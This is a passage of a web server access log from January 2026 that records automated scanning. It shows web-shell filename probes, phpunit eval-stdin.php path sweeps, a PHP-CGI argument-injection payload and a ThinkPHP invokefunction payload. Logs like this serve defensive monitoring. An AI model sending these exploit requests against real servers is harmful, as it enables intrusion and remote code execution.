-] "-" "-" +[19/Jan/2026:06:40:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/shell20211028.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ton.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/item.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lala.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:43 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/baxa1.phP8" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/page.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tempfuns.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/past.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:44 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/log.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wen.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/index.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:45 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sf.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//simple.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admiin.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/9v6.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:46 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//doc.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ha.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/F0x.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file2.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:47 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cong.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a2.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/up4.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gtc.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dbc.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:48 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xa.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/content.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/oo.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/info.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:49 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws35.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/222.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/z60.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-freya.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:50 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ccou.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abc.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ant.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ma.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:51 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gecko.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws29.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1100.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws46.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:52 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws43.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws36.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws34.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/rtx.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:53 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/as.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ova.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/blox.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/vx.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:54 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mh.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pn.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/O-Simple.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/smklh.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mans.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:55 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/horeg.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/admin.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/to.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:56 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-good.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fz.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mini.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:57 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//x.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ioxi-o.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xxxx.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/moon.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:58 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws46.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-22.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//user.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/classwithtostring.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//content.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-ana.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cwclass.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/87.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/error.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/redi.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wsd.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/image.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abcd.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/indo.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0xx.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/o.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/style.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/manager.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geck.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-configs.php?" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/11.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/s.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sid3.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ng.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/m.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webix.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/az.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/hans.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//403.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//404.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:41:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "//buy.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:43:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:06:47:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:07:05:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:07:25:02 +0000] 404 - GET http 91.82.83.208 "/login.asp" [Client 95.214.55.246] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:07:28:24 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 70.23.81.129] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:07:31:44 +0000] 404 - GET http 91.82.83.208 "/ReportServer" [Client 172.174.211.117] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[19/Jan/2026:07:44:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:07:53:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:07:57:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 71.6.232.28] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[19/Jan/2026:07:58:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.231.89.135] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:07:58:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 91.231.89.15] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[19/Jan/2026:07:59:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:00:32 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:08:01:44 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:02:55 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:19:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:08:27:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.165.76] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:08:30:26 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 212.56.47.141] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:08:30:26 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 212.56.47.141] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:08:30:26 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 212.56.47.141] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:27 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:28 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:29 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:30 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:31 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:32 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 212.56.47.141] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:08:30:33 +0000] 404 - GET http 91.82.83.208 